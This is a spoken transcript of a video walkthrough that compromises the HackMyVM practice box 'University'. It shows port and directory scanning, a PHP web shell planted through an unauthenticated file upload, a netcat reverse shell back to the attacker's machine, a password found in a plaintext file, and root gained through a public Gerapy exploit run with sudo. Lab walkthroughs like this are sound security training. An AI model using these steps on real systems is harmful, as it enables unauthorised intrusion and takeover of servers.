Hello everyone, welcome once again. Today we are going to do University from HackMyVM. Um, it's released in the first month of 2022, so it's a relatively new box. The author is SML and the difficulty level is easy. So the box is up and running. Let's try pinging it first. Yes, it is alive and the TTL value tells us that it's a Linux based box. Because if it's Windows, normally you are going to see TTL of 128. So let's start with nmap to see what ports are open and what services are running on it. So I'll start with nmap -r. In this way, nmap is going to run in sequential order. It's going to first scan for port number 1, 2, 3, and all the way how many ports you specify. V for verbose, -p dash for all ports, and SC to enumerate different scripts, SV to list down the version or banner grabbing of services, and ON to write this to a file. Nmap TCP ports all 192.168.10.104, and it's running, and immediately we see that there are two ports running. One is 22, that's going to be usually SSH, and 80 is normally for web service or for HTTP based server. So here we see that on port 22 OpenSSH is running, and its banner tells us that this is a Debian based box. And on port 80 we see Nginx running, which is nice. And I see that there is a Git repository that has been basically found, and it's basically being redirecting to this thing, online admission system. So let's start with the web part. This is going to be 192.168.10.104, and this is the website. And is this made in PHP or what? We should try putting a PHP extension, and I see that it's the website is loaded, so I guess this is made in PHP. If I try like HTML, it doesn't work, so this means that this is a PHP based web application. So we can try for like something like SQL injection, admin, or 1 equals 1. Let's see. And oops, password can be a password, invalid username or password, so it's not working. Maybe try like this thing. This is going to basically another SQL injection thing, and it again says this is an invalid username or password. So let's start the gobuster thing in background. This is going to be gobuster dir, E for extended view, W for word list. I'm going to use user share word list, directory buster, and big.txt. Number of threads should be, I guess, 6. URL would be this thing. And what else do we need to specify? I guess we need to specify the extension. This is going to be PHP, look for txt files, and let's just save this thing to 002 gobuster.log. So I immediately see a number of different pages. I see a.php, admin login, captcha, file upload, tabs, npp project, documents, and different things. So this gobuster thing has already finished, and if I try like adminlogin.php, I guess this is a different page, but let's try admin. Doesn't work. Admin, some basic SQL injection, doesn't work. We can try running SQL map against it for some advanced or custom queries, but before that I guess we should try visiting this thing. This is https github.com online admission system. So I'll copy this thing and paste it over here. Let's see what we get. In the meantime, I can visit different, let's see what documents.php has. There is no so we have identified the first vulnerability, that is like improper access control. Right now we can access this page. I guess this page shouldn't be accessible without the proper authentication. So we can try uploading different things. Maybe we have some kind of, we have to upload files, but I don't see any validation like JavaScript validation. Maybe it's implemented on server side. We can try uploading different files and get exploit the vulnerability, arbitrary file upload vulnerability, which allows an attacker to upload malicious PHP files and have a command execution. But instead of doing this way, we can have a look at the code, and I see that this code is like 5 years old. So definitely there can be some vulnerabilities out. And I see different things. We have a SQL file that seems nice. Do we have some passwords in it? Admin is the ID, password is going to be admin. So can we try logging in with this? I guess, can we? If the author hasn't changed that thing, we can try admin login. So this is going to be admin login.php. So admin ID is going to be AD001 if it's using this default thing, and the password is going to be admin. Does it work? Invalid login, please try again. It doesn't. Let's try looking for some exploits on the internet for online admission system. I guess exploit online admission system, and I see that in January 2022 there is a remote code execution available for this. So let's see what we have in the exploit exactly. And internet is terribly slow. Anyways, what we have, any other interesting file? Images can also be an interesting thing. It's forbidden, we cannot access it. I guess we didn't use this file upload thing. File upload is also not available. So this is saying that online admission system 1.0 remote code execution unauthenticated. I don't know whether this version is 1.0 or not. Maybe it's 1.0. Do we have some kind of version details? Version, nope, 1.0. I don't see anything. So I guess that should be vulnerable, right? The software link is available over here. So definitely this thing is vulnerable to this exploit. So, and it's just going to documents.php, which we already did, and it's uploading a cmd.php file, and this file is available, will be available in the student pick directory. So instead of using this exploit, let's try doing it manually. So I should have, let's just make a PHP reverse shell, web shells, PHP, CMD, maybe RC. I have made this custom simple shell, PHP rce.php. This is going to execute systems command and getting CMD variable from the user. So let's try uploading it to documents.php. Where is that thing? Here is it. So maybe like passport size image, and if we go over here, which is like this path, this is the PHP file, and I accept. Did it upload or not? Not sure exactly. I need to try student pick rce.php. It's not found. Student pick rce.php. Print. Submit query. I think I should have clicked submit query rce.php. Submit query. There is an error. Please check or retry again. And I see that now it's loading and it's displaying this my or thing. So let's just try cmd id, and we have a command execution. I see that the command is running successfully. So if I type like who am I, and echo please subscribe. I get a command execution over here. So the next thing we can do is like having what should we have? A reverse shell. So I'll start a netcat listener on a line wrap netcat lvnp port 80. It's usually beneficial to have reverse shell on the port on which the ports in which the server is listening on. So right now we see that ports our server is listening on like 22 and 80. So that's why I'm catching reverse shell on 80, but you can try some other ports also. So do we have like which nc and ic and netcat is available. So let's try what is my IP. Before I do this, I need to know my IP, which is going to be 10.108. So 10.108. So nc minus e bin bash 192.168.10.108. Port is going to be 80, and just AND operator is going to fork this process. And I don't see anything. Let's just try it without AND. And I again see nothing. 192.168.10.108. nc minus e bin bash. Oops. I guess I need to specify a space like this. And we have reverse shell over here. Who am I? Who am I? I just need to zoom it a bit. Right, so here is our reverse shell. Now I need to make my shell interactive. I have already opened my cheat sheet. The first step is calling Python, Control Z, stty raw echo fg, enter. Export shell is bash. Export term is 256 colors. And now I need to see my stty size, that is 28111. So this is going to be 111 and 28, and now I need to reset it. Right, so what we have over here, we have like the file has been uploaded, so there is arbitrary file upload vulnerability over here. And if we see rce.php, we see our command execution code that we have uploaded. So we are in like var whtml university student pick. Let's just move a bit outside and see what we have. These are all the files present. I wonder what's in os.sql. We have a bunch of entries. What about the admin entry we looked for? Admin. So the entry is present over here, but I don't know why it didn't work. What ports we have running? Do we have MySQL running? MySQL is not running. I guess this page is like not doing anything. I mean, there is no backend authentication system running, I guess, like that. Anyways, let's go a bit behind, and we have university, do it LA, and I see Sandra secret. So what exactly is Sandra secret? We should have tried first the password thing with grep bash. So this is going to tell us what users are present on the system having bash with them, and I see that there are right now only 2 users, Sandra and root. So LA to see the hidden files, and Sandra secret. My yoga is easy. So let's just switch to Sandra. And we are Sandra at the @university. Right, so I don't think now we can do this SSH thing. Sandra at the @192.168.10.104. Yes, password is going to be my yoga is easy. So we are in. Now we need to think what we can do. Let's just try It's Debian 11 version, so I don't think we have any kind of kernel exploits available. We can run an linp script for further enumeration, but let's try running the sudo thing to see can we run any sudo commands. And we can. So we can run this sudo command for this gerapy, which I'm not sure, maybe a binary. Let's just quickly look what it is. It's a Python script, and if I do get this thing, what we get. So I'm not sure what gerapy is, and let's try running it with sudo gerapy, and it's showing different things. Distributed crawler management framework. So some kind of crawler framework management. Gerapy 0.96. Let's just look for any public exploits for this. Search for an exploit db. I'll search for gerapy. Let's see, do we have any public exploits available for gerapy, what exactly it is. And we have release date is 2022, so it's fairly easy. 0.97 and tested on 0.96, so this is going to be the exploit. Right, but I think that we need to first start gerapy. Let's see what commands are available. Normally on git we can see different commands for running this project. So distributed crawler management framework based on scrappy yd, django, and vue.js. 0.9.10 is released 24 days ago. So here is the usage. We have to initialize it, so let's just move to dev shm. We are in it, and now I need to init, I guess. Initialize, right. It is initialized. Now we need to go inside the gerapy folder, cd. Now we need to run migrate. So migrate. It's running. It is, and everything seems okay. Nice. Now we need to create a super user, so let's do this. Username is going to be binsack, email binsack@nomail.com. Password is going to be please subscribe. The password is very small. Do you want to continue? Yes, I want to continue. User is created, and this is going to run the server locally, but I need to run this in public mode. So I'll run this run server and this port. Let's start this run server on port maybe like 10,000. 1, 2, 3. So the server is running, that seems right, and now we need to use this exploit. So let's just download it, or maybe we can copy it, and I'll come over here, vim gerapy exploit.py, set it to paste. Here is it. So now let's just try gerapy exploit and see what we get. Come on, it's taking too long. I needed to specify some flags or what? Right, it's here. So it's requiring some URL. URL is going to be 192.168.10.104. Target port is going to be 10,00123. Localhost is going to be my IP, which in this case I keep forgetting is, come on, if I can type it, 10.108, right? 192.168.10.108. And port is going to be, let's say we want our reverse shell to be on port 999. Quad 9. resolving URL. We have a request, post API bad request. Why it is a bad request? Oh, I think we need to specify some kind of credentials. So let's go over here, admin, right? This is the thing which we need to edit. This is going to be bensec. The password is going to be please sub. And now, can we run it? Resolving URL. Previous time it was logging into the application. So login successful. Getting the project list, and we see index out of range. Why we don't have any projects? We can create I guess let's just create a project over here. Let's just run this command. Maybe we can have something like that. Yes, we have now. And if I try to run server over again, so now we have initialized this projects folder with something, and we have few folders inside it, and it's up and running. And now if I try to run this exploit, resolving URL, logging into application, login successful, getting the project list, found project gerapy, getting the ID of the project, found ID, listening on port quad 9, and we are root. That seems great. So if we go inside cd/root ID, I am root, lsl, gerapy 0.9.7 and root.txt. So instead of showing the root, let's just root.txt, 20 characters. And what is this gerapy thing? Just to see, oops, I think password is going to be 1234, and now I need to just ssh root 192.168.10.104. Password is 1234, but we don't have that. Permission denied. Nano etc sshd underscore config does not exist. Oops. cd etc ssh dir cd. Why don't I cannot change this thing, and it's gone. Let's try running the exploit again, and the box has already been pawned. I guess I need to show that Sandra home Sandra flag wc user.txt, 20 characters again. And I guess that's it from this box. Maybe some other time we can try some other things, but right now this is it. ls la and root.txt, profile, bash history. Do we have bash history? I mean, I'll always like to see bash history, and then we can close it. Passwd. These are all my commands that I basically have typed, not this dir thing. Anyways, this was the box. Hope you liked it, and please remember to like this video, share it with others, and subscribe. Hit subscribe button, people. Okay, bye bye next time. I'll see you next time.